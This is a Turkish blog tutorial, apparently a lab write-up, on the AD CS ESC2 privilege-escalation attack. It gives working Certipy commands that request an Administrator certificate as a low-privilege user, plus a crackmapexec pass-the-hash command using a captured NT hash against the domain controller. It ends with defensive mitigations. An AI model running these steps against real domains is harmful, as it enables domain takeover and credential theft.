AD CS ESC2 Attack

AD CS ESC2 Attack yazımızda sizlere daha önceki yazılarımızda bahsettiğimiz ESC Atak tiplerinden ikincisini anlatacağım. İlk atak tipinde ESC1 olanda yanlış yapılandırma sonucunda DC üzerinde yapabileceğimiz işlemleri ve domain adminlere giden yolu göstermiştik. Bu yazımızda yine aynı işlem uygulanacak fakat burada Application Policies değişecek ve ona göre işlem yapılacaktır.

Senaryo

  • CA Server: KORCA01
  • CA Service Name:koraycan-KORCA01-CA
  • DC IP:10.10.10.40
  • RID500: Not Renamed, Administrator
  • StandarUser : Domain Users

Certifica Sunucumuzda Yeni bir Sertifika Template Oluşturduk. İsmi ESC1 olarak ve Template Şu özelliklere Sahip;

  • Any Purpose or None: True
  • Enabled: True
  • Enrollee Supplies Subject: True
  • Requires Management Approval: False
  • Permission: Domain Users or Authenticated Users has Enroll Permission(Low Privileges Users Enroll Permission)

Template Özellikleri aşağıdaki gibidir.

Yanlış yapılandırılmış bir sertifika template publish edilmiş durumdadır.

CERTIPY ile ESC2 Attack

İlk olarak kali üzerinde aşağıdaki komutu çalıştırıyoruz. Ve sertifikalara ulaşıyoruz.

certipy find -vulnerable -dc-ip 10.10.10.40 -u username -p password

Sonrasında Dışarıya certificate template’ler txt ve json olarak çıkarıldı.

Sertifika Template’lerine Ait Bilgilerin Açılması

Şimdi sertifika templatelerine ait hangi atakları gerçekleştirebiliriz, kontrollerini sağlıyoruz. Export edilen txt dosyasını cat komutları ile açıyoruz.

Yukarıda senaryoda anlattığımız bölümdeki tüm pre-requisited uyduğundan ESC2 atak gerçekleştirebiliyoruz. Ayrıca ESC 1 gerçekleştirebiliyoruz. Bunu yapmak için diğer yazıma bakabilirsiniz.

Haydi Sertifika isteğinde bulunalım.

certipy req -dc-ip 10.10.10.40 -u standartuser@koraycan.com -p 'Password1' -ca koraycan-korca01-ca -target KORCA01 -template ESC2 -upn Administrator@koraycan.com -dns Administrator.koraycan.com
AD CS ESC 2 Attack

Şimdi sıra geldi administrator ile authentication olmaya ve NT Hash’i ele geçirmiş olduk artık istediğimiz sunucuya girebiliriz. Özelliklede Domain Controllerlara 🙂

Admin NT Hash Elimizde artık istediğimizi yapabiliriz.

DC üzerindeki Share’lara bağlanmaya çalışalım

crackmapexec smb 10.10.10.40 -u administrator -H :a97a67372d7d7a1dfde5d58a29cf5837 --shares 
AD CS ESC 2 Attack shares

Impacket ile hashleri çıkartalım.

Mitigation ESC2 Attack

Öncellikle bu tip işlemlerin izlenmesi için Audit açılması gerekmektedir. Tüm auditler ile ortam izleme altına alınabilir.

CA Audit Policy

Ayrıca CA Auditing açılmasında fayda vardır.

AD CS ESC 2 Attack Audit

Bu atakta kullanılan Template’da ayrıca yapılması gerekenler;

Supply in the request’i Build Active Directory Information olarak değiştirilmelidir.

AD CS ESC 2 Attack Supply

Sonrasında CA Manager Approval enable duruma getirilmelidir.

AD CS ESC 2 Attack CA Approval

Ayrıca Domain Users , Authenticated Users veya low-privileges users groubundan enrol yetkisi kaldırılmalıdır.

AD CS ESC 2 Attack Remove Enroll

Sonuç olarak AD CS ESC2 Attack nasıl gerçekleşir ve hangi tip template’lere bu atak gerçekleşmektedir. Ayrıca Audit nasıl açılmaktadır tüm örnekleri ile göstermiş olduk. Diğer yazılarımı aşağıdaki kategorilerden takip edebilirsiniz.